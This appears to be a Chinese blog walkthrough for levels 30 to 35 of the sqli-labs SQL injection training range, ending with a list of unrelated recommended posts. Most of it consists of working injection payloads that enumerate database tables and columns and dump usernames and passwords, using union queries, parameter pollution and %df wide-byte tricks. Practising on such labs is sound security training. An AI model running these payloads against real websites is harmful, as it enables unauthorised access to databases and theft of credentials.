sqlilabs第三十关到第三十五关靶场攻略

第三十关

第三十关和二十九关差不多,将单引号换成双引号

查询表名,字段名,数据

?id=1&id=-2" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
?id=1&id=-2" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+
?id=1&id=-2" union select 1,group_concat(password,username),3 from users--+

第三十一关

查询数据库名

查询表名

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

普通的联合注入( 如果不行,可以尝试一下?id=1&id=-1") )

照正常流程走就好了

第三十二关(宽字节注入)

在1后面加%df让他成为一个字符

?id=-1%df' union select 1,2,database()--+

后面还是联合查询一样的流程

第三十三关

跟三十二一样都是宽字节注入\

?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

第三十四关

这关还是宽字节注入,可以到是POST提交

我们到bp重放器进行注入

admin%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() #

继续联合注入就行

第三十五关

数字型的宽字节注入但是这关不需要%df

直接联合注入就拿下这关

?id=-1 union select 1,2,database()--+
?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database() #
?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273 #
相关推荐
凡人的AI工具箱1 小时前
每天40分玩转Django:Django缓存视图
开发语言·数据库·后端·python·缓存·django
编程乐趣2 小时前
一款可以替代Navicat的数据库管理工具
数据库·c#
Zmxcl-0072 小时前
sql第(18~20)关
数据库
别这么骄傲3 小时前
使用Flinkcdc 采集mysql数据
大数据·数据库·flink
无奈ieq4 小时前
Redis基本语法集合(示例+语法格式)
数据库·redis·缓存
loop lee4 小时前
Redis - 集合 Set 及代码实战
java·数据库·redis·mysql·算法
一位资深码农4 小时前
redis问题解决方法
数据库·redis·缓存
权^4 小时前
[面试题]--索引用了什么数据结构?有什么特点?
数据结构·学习·mysql
{⌐■_■}8 小时前
【c++】自定义命名空间namespace与头文件的组织与企业应用案例
服务器·数据库·c++